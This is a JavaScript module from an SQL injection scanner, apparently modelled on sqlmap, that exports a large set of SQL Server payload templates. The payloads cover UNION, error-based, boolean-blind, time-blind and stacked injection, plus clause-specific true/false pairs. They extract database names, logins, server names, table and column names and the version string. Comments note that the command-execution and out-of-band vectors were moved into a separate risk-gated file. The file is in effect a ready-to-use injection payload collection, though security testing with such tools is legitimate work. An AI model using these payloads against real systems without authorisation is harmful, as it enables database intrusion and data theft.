// SQL Server payload 模板（从 payloads.js 拆分）
// 占位符：{ORIG}=原始值 {SLEEP}=延迟秒数 {NUM}=随机整数 {SEP}=注释符

export const sqlserverPayloads = {
  union: [
    "{ORIG} UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    "{ORIG}' UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    '{ORIG}" UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -',
    "{ORIG}) UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    "{ORIG}') UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    "{ORIG} UNION ALL SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    "{ORIG}' UNION SELECT {NUM},@@VERSION,USER_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},DB_NAME(),@@SERVERNAME-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT name FROM sys.databases WHERE database_id=DB_ID()),1-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT name FROM sys.syslogins WHERE name NOT IN ('sa') AND name != SYSTEM_USER),1-- -",
    // —— 扩容：闭合组合（')) / ")）× 表达式族（对标 sqlmap UNION payload 矩阵）——
    "{ORIG}')) UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -",
    '{ORIG}")) UNION SELECT {NUM},DB_NAME(),SYSTEM_USER-- -',
    "{ORIG}')) UNION ALL SELECT {NUM},@@SERVERNAME,DB_NAME()-- -",
    "{ORIG}')) UNION ALL SELECT {NUM},SYSTEM_USER,DB_NAME()-- -",
    "{ORIG} UNION SELECT {NUM},@@SERVICENAME,@@SERVERNAME-- -",
    "{ORIG} UNION SELECT {NUM},@@SERVICENAME,DB_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},SUSER_SNAME(),DB_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT name FROM sys.databases ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY),1-- -",
    "{ORIG} UNION ALL SELECT {NUM},@@VERSION,HOST_NAME()-- -",
    '{ORIG}" UNION ALL SELECT {NUM},DB_NAME(),HOST_NAME()-- -',
    "{ORIG}') UNION ALL SELECT {NUM},DB_NAME(),@@SERVERNAME-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1-- -",
    "{ORIG} UNION SELECT {NUM},DB_NAME(),(SELECT COUNT(*) FROM sysobjects)-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT name FROM sys.server_principals WHERE sid=SUSER_SID()),1-- -",
    '{ORIG}" UNION SELECT {NUM},(SELECT name FROM sys.databases WHERE database_id=DB_ID()),1-- -',
    "{ORIG}' UNION ALL SELECT {NUM},SUSER_SNAME(),HOST_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT TOP 1 name FROM syscolumns WHERE id=OBJECT_ID('sysusers')),1-- -",
    // —— sqlmap parity 扩容：UNION SELECT NULL 多列探测 + 标量子查询回显（对标 sqlmap UNION 矩阵）——
    "{ORIG}' UNION SELECT NULL,NULL,DB_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},NULL,SYSTEM_USER-- -",
    "{ORIG} UNION ALL SELECT NULL,NULL,@@VERSION-- -",
    "{ORIG}' UNION SELECT NULL,NULL,NULL-- -",
    "{ORIG}') UNION SELECT NULL,NULL,DB_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},DB_NAME(),(SELECT TOP 1 name FROM sys.tables)-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT TOP 1 name FROM sys.objects WHERE type='U'),SYSTEM_USER-- -",
    "{ORIG} UNION SELECT {NUM},(SELECT DB_NAME(DB_ID())),USER_NAME()-- -",
    "{ORIG}' UNION SELECT {NUM},@@VERSION,(SELECT TOP 1 name FROM sys.databases ORDER BY name)-- -",
    "{ORIG}' UNION ALL SELECT {NUM},NULL,(SELECT name FROM sys.syslogins WHERE name=SYSTEM_USER)-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT @@servername),(SELECT DB_NAME())-- -",
    "{ORIG}')) UNION SELECT NULL,NULL,DB_NAME()-- -",
    '{ORIG}")) UNION SELECT NULL,NULL,DB_NAME()-- -',
    "{ORIG}' UNION SELECT {NUM},SYSTEM_USER,(SELECT TOP 1 name FROM syscolumns WHERE id=OBJECT_ID('sysusers'))-- -",
    "{ORIG} UNION SELECT {NUM},(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES),SYSTEM_USER-- -",
    "{ORIG}' UNION SELECT {NUM},(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='sysusers'),DB_NAME()-- -",
    "{ORIG} UNION ALL SELECT {NUM},@@SERVICENAME,(SELECT name FROM sys.databases WHERE database_id=1)-- -",
    "{ORIG}' UNION SELECT {NUM},DB_NAME(),(SELECT COUNT(*) FROM sys.tables)-- -",
  ],
  error: [
    "{ORIG}' AND 1=CONVERT(int,(SELECT DB_NAME()))-- -",
    '{ORIG}" AND 1=CONVERT(int,(SELECT DB_NAME()))-- -',
    "{ORIG}' AND 1=CAST((SELECT DB_NAME()) AS int)-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT @@VERSION))-- -",
    "{ORIG}' AND 1=CAST((SELECT DB_NAME()) AS bigint)-- -",
    "{ORIG}' AND (SELECT (SELECT DB_NAME() FOR XML PATH(''))).value('a','int')-- -",
    "{ORIG}') AND 1=CONVERT(int,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM sys.syslogins WHERE name=SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM sys.databases WHERE database_id=DB_ID()))-- -",
    "{ORIG}' AND (SELECT (SELECT SYSTEM_USER FOR XML PATH(''))).value('a','int')-- -",
    // —— 扩容：1/0 除零 + conversion 族（decimal/float/money/datetime/int）——
    "{ORIG}' AND 1=(SELECT 1/0)-- -",
    "{ORIG}') AND 1=(SELECT 1/0)-- -",
    "{ORIG}' AND 1 IN (SELECT 1/(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(decimal,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(float,(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(money,(SELECT name FROM sys.databases WHERE database_id=DB_ID()))-- -",
    "{ORIG}' AND 1=CONVERT(datetime,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CAST((SELECT SYSTEM_USER) AS int)-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM sys.server_principals WHERE sid=SUSER_SID()))-- -",
    // —— 扩容：CONVERT @@version 直引 + 注释符 /**/ 变体 + 堆叠除零 ——
    // 注：xp_cmdshell 已移入 destructive.js（risk≥3 门控），不在默认 error 池。
    "{ORIG}' AND 1=CONVERT(int,@@version)-- -",
    "{ORIG}' AND 1=CONVERT(int,@@version)/**/",
    "{ORIG}'; SELECT 1/0-- -",
    // —— 深度扩容：CONVERT 类型族（bigint/smallint/uniqueidentifier/binary targets）——
    "{ORIG}' AND 1=CONVERT(bigint,@@servername)-- -",
    "{ORIG}' AND 1=CONVERT(int,@@servername)-- -",
    "{ORIG}' AND 1=CONVERT(int,DB_NAME())-- -",
    "{ORIG}' AND 1=CONVERT(bigint,(SELECT @@VERSION))-- -",
    "{ORIG}' AND 1=CONVERT(smallint,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(tinyint,(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(uniqueidentifier,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(binary,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(numeric,(SELECT @@VERSION))-- -",
    // —— CAST 类型族（bigint/date/money/datetime）——
    "{ORIG}' AND 1=CAST((SELECT @@VERSION) AS bigint)-- -",
    "{ORIG}' AND 1=CAST((SELECT DB_NAME()) AS date)-- -",
    "{ORIG}' AND 1=CAST((SELECT DB_NAME()) AS money)-- -",
    "{ORIG}' AND 1=CAST((SELECT SYSTEM_USER) AS datetime)-- -",
    // —— 子查询除零 / 堆叠报错变体（RAISERROR / 非法对象）——
    "{ORIG}'; RAISERROR('test',16,1)-- -",
    "{ORIG}' AND (SELECT 1/0)=1-- -",
    "{ORIG}' AND (SELECT 1/DB_NAME()) IS NULL-- -",
    "{ORIG}'; SELECT 1/0/**/",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM syslogins))-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM sys.database_principals WHERE name=USER_NAME()))-- -",
    // —— 注释符 /**/ 变体 ——
    "{ORIG}'; RAISERROR('test',16,1)/**/",
    "{ORIG}' AND 1=CONVERT(bigint,@@servername)/**/",
    // [SQLMAP-PARITY] FORMATMESSAGE / FOR JSON / HASHBYTES（纯报错回显，无外连/无写操作）
    "{ORIG}' AND 1=CONVERT(int, FORMATMESSAGE('%s', (SELECT DB_NAME())))-- -",
    "{ORIG}' AND 1=(SELECT 1 FROM (SELECT (SELECT DB_NAME()) FOR JSON AUTO) AS a)-- -",
    "{ORIG}' AND 1=CONVERT(int, (SELECT master.dbo.fn_varbintohexstr(HASHBYTES('MD5', DB_NAME()))))-- -",
    // 注：OPENROWSET 外连向量已移出默认池 —— 原实现硬编码 attacker.com，
    // 会在默认 error 检测中对目标库发起第三方外连。见 destructive.js（需 risk>=3）。
    // —— sqlmap parity 扩容：CONVERT/CAST 类型族补全（对标 sqlmap MSSQL error type-mismatch 矩阵）——
    "{ORIG}' AND 1=CONVERT(int,(SELECT @@servicename))-- -",
    "{ORIG}' AND 1=CONVERT(bigint,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(decimal,(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(float,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(money,(SELECT @@VERSION))-- -",
    "{ORIG}' AND 1=CONVERT(datetime,(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(smallint,(SELECT @@VERSION))-- -",
    "{ORIG}' AND 1=CONVERT(tinyint,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(uniqueidentifier,(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1=CONVERT(binary,(SELECT @@VERSION))-- -",
    "{ORIG}' AND 1=CONVERT(numeric,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT name FROM sys.databases ORDER BY name OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY))-- -",
    "{ORIG}' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sys.server_principals WHERE type='S'))-- -",
    "{ORIG}' AND 1=CAST((SELECT @@servicename) AS int)-- -",
    "{ORIG}' AND 1=CAST((SELECT SYSTEM_USER) AS bigint)-- -",
    "{ORIG}' AND 1=CAST((SELECT @@VERSION) AS money)-- -",
    "{ORIG}' AND 1=CAST((SELECT DB_NAME()) AS decimal)-- -",
    "{ORIG}' AND 1=CAST((SELECT @@servername) AS float)-- -",
    "{ORIG}' AND 1=CAST((SELECT @@version) AS binary)-- -",
    "{ORIG}' AND 1=CAST((SELECT name FROM sys.databases WHERE database_id=DB_ID()) AS int)-- -",
    '{ORIG}" AND 1=CAST((SELECT DB_NAME()) AS bigint)-- -',
    "{ORIG}') AND 1=CAST((SELECT SYSTEM_USER) AS int)-- -",
    "{ORIG}')) AND 1=CONVERT(int,(SELECT DB_NAME()))-- -",
    "{ORIG}' AND (SELECT (SELECT @@version FOR XML PATH(''))).value('a','int')-- -",
    "{ORIG}' AND (SELECT (SELECT @@servername FOR XML PATH(''))).value('a','int')-- -",
    "{ORIG}' AND 1 IN (SELECT 1/(SELECT SYSTEM_USER))-- -",
    "{ORIG}' AND 1 IN (SELECT 1/(SELECT @@version))-- -",
    "{ORIG}' AND 1=CONVERT(int, FORMATMESSAGE('%s', (SELECT SYSTEM_USER)))-- -",
  ],
  boolean: [
    "{ORIG}' AND '1'='1",
    '{ORIG}" AND "1"="1',
    "{ORIG}' AND '1'='2",
    '{ORIG}" AND "1"="2',
    "{ORIG} AND 1=1",
    "{ORIG} AND 1=2",
    // [6,7] OR-based 布尔变体（对标 sqlmap risk>=2 的 OR 边界，BooleanBlindDetector 在 risk>=2 时投放）
    "{ORIG}' OR '1'='1",
    "{ORIG}' OR '1'='2",
    // —— 扩容：注释符 /**/ 变体 + UPDATE 逗号拼接（对标 sqlmap MSSQL 向量）——
    "{ORIG}' AND '1'='1/**/",
    "{ORIG}' AND '1'='2/**/",
    "{ORIG},1=1-- -",
    "{ORIG},1=2-- -",
    // —— 深度扩容：子查询布尔（@@version 首字符探测；真假对）+ 多重括号闭合 ——
    "{ORIG} AND (SELECT SUBSTRING(@@version,1,1))='M'-- -",
    "{ORIG} AND (SELECT SUBSTRING(@@version,1,1))='x'-- -",
    "{ORIG}' AND (SELECT SUBSTRING(@@version,1,1))='M'-- -",
    "{ORIG}' AND (SELECT SUBSTRING(@@version,1,1))='x'-- -",
    "{ORIG} AND (SELECT LEFT(@@version,1))='M'-- -",
    "{ORIG} AND (SELECT LEFT(@@version,1))='x'-- -",
    "{ORIG} AND (SELECT 1)=(SELECT 1)-- -",
    "{ORIG} AND (SELECT 1)=(SELECT 2)-- -",
    "{ORIG}')) AND 1=1-- -",
    "{ORIG}')) AND 1=2-- -",
    // —— sqlmap parity 扩容：AND/OR 真假对 + LIKE + SUBSTRING/ASCII + HAVING + 注释符（对标 sqlmap MSSQL boolean）——
    "{ORIG} AND 1=1-- -",
    "{ORIG} AND 1=2-- -",
    "{ORIG}' AND '1'='1'-- -",
    "{ORIG}' AND '1'='2'-- -",
    '{ORIG}" AND "1"="1"-- -',
    '{ORIG}" AND "1"="2"-- -',
    "{ORIG} OR 1=1-- -",
    "{ORIG} OR 1=2-- -",
    "{ORIG}' OR '1'='1'-- -",
    "{ORIG}' OR '1'='2'-- -",
    "{ORIG}' AND (SELECT @@version) LIKE 'M%'-- -",
    "{ORIG}' AND (SELECT @@version) LIKE 'x%'-- -",
    "{ORIG} AND ASCII(SUBSTRING(@@version,1,1))>0-- -",
    "{ORIG} AND ASCII(SUBSTRING(@@version,1,1))>999-- -",
    "{ORIG} AND EXISTS(SELECT 1)-- -",
    "{ORIG} AND EXISTS(SELECT 1 WHERE 1=2)-- -",
    "{ORIG} AND (SELECT LEN(DB_NAME()))>0-- -",
    "{ORIG} AND (SELECT LEN(DB_NAME()))<0-- -",
    "{ORIG}' AND 1=(CASE WHEN 1=1 THEN 1 ELSE 0 END)-- -",
    "{ORIG}' AND 1=(CASE WHEN 1=2 THEN 1 ELSE 0 END)-- -",
    "{ORIG} AND (SELECT COUNT(*) FROM sysobjects)>0-- -",
    "{ORIG} AND (SELECT COUNT(*) FROM sysobjects)<0-- -",
  ],
  time: [
    "{ORIG}'; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    '{ORIG}"; WAITFOR DELAY "0:0:{SLEEP}"-- -',
    "{ORIG}' WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG} WAITFOR DELAY '0:0:{SLEEP}'-- -",
    // —— 扩容：括号闭合组合（原数组内 2 条精确重复已去重，替换为有效变体）——
    "{ORIG}'); WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}')) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    '{ORIG}") WAITFOR DELAY "0:0:{SLEEP}"-- -',
    "{ORIG}); WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}' AND 1=1; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    // —— 扩容：数字上下文 WAITFOR + 注释符 /**/ 变体 ——
    "{ORIG} AND 1=1; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}' WAITFOR DELAY '0:0:{SLEEP}'/**/",
    // —— 深度扩容：IF(1=1) WAITFOR 条件延迟 + 堆叠变体 + 注释符补充 ——
    "{ORIG}'; IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}'; IF(1=2) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}' IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG} AND 1=1; WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}'; IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}' OR 1=1; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}') AND 1=1; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG})); WAITFOR DELAY '0:0:{SLEEP}'-- -",
    // 注：xp_dirtree / xp_fileexist（UNC 外连，原实现硬编码 attacker.com）与
    // sp_execute_external_script（Python 脚本执行 = RCE）已移出默认池，
    // 见 destructive.js（需 risk>=3 显式开启）。
    // —— sqlmap parity 扩容：IF 条件延迟对 + 标量子查询延迟 + 闭合/注释符变体（对标 sqlmap MSSQL time-blind）——
    "{ORIG}') WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}')) WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}' AND 1=2; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG} OR 1=2; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}'); IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}')); IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}' IF(1=2) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}'); WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}' AND 1=1; WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}'; IF(1=2) WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}' OR 1=1; WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG}' OR 1=2; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}') AND 1=2; WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG})); IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}' IF(1=1) WAITFOR DELAY '0:0:{SLEEP}'/**/",
    "{ORIG} AND (SELECT 1)=(SELECT 1); WAITFOR DELAY '0:0:{SLEEP}'-- -",
    "{ORIG}'; IF((SELECT COUNT(*) FROM sysobjects)>0) WAITFOR DELAY '0:0:{SLEEP}'-- -",
  ],
  // 堆叠注入：以 `;` 追加独立的 WAITFOR DELAY 延迟语句
  stacked: [
    "{ORIG}; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    '{ORIG}"; WAITFOR DELAY "0:0:{SLEEP}" {SEP}',
    "{ORIG}); WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}') ;WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}')) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    // —— 深度扩容：IF WAITFOR 堆叠 + 注释符（非破坏性探测）——
    "{ORIG}'; IF(1=1) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'; SELECT 1/0 {SEP}",
    "{ORIG}' AND 1=1; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    // [SQLMAP-PARITY] xp_regread（读注册表）与 sp_configure 开启 xp_cmdshell（需 risk>=3）
    // —— sqlmap parity 扩容：IF 条件堆叠 + 多语句堆叠 + RAISERROR 报错堆叠（对标 sqlmap MSSQL stacked）——
    "{ORIG}'; IF(1=2) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'); WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}')); WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'; IF((SELECT COUNT(*) FROM sysobjects)>0) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}' AND 1=2; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG} OR 1=1; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'; SELECT 1/0; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}'; SELECT 1/(SELECT DB_NAME()) {SEP}",
    "{ORIG}'; RAISERROR('test',16,1) {SEP}",
    "{ORIG}')); IF(1=1) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}) WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
    "{ORIG}' OR 1=2; WAITFOR DELAY '0:0:{SLEEP}' {SEP}",
  ],
};

// SQL Server 子句位置感知模板（CLAUSE_PAYLOADS['SQL Server']）
export const sqlserverClauses = {
  // ORDER BY 列位置：T-SQL 禁止子查询直接出现在 ORDER BY 标量位，改用 CASE 表达式（假分支除零报错）
  orderby: {
    boolean: [
      ["{ORIG},(CASE WHEN 1=1 THEN 1 ELSE 1 END)-- -", "{ORIG},(CASE WHEN 1=2 THEN 1 ELSE 1/0 END)-- -"],
    ],
    error: ["{ORIG},(CONVERT(int,(SELECT DB_NAME())))-- -"],
  },
  groupby: {
    boolean: [
      ["{ORIG} HAVING 1=1-- -", "{ORIG} HAVING 1=2-- -"],
      ["{ORIG}' HAVING '1'='1'-- -", "{ORIG}' HAVING '1'='2'-- -"],
    ],
  },
  having: {
    boolean: [["{ORIG} AND 1=1-- -", "{ORIG} AND 1=2-- -"]],
  },
  // T-SQL 用 TOP 而非 LIMIT：无 limit 子句变体
  where: {
    boolean: [
      ["{ORIG}') AND 1=1-- -", "{ORIG}') AND 1=2-- -"],
      ["{ORIG}')) AND '1'='1'-- -", "{ORIG}')) AND '1'='2'-- -"],
      ['{ORIG}") AND 1=1-- -', '{ORIG}") AND 1=2-- -'],
    ],
  },
};
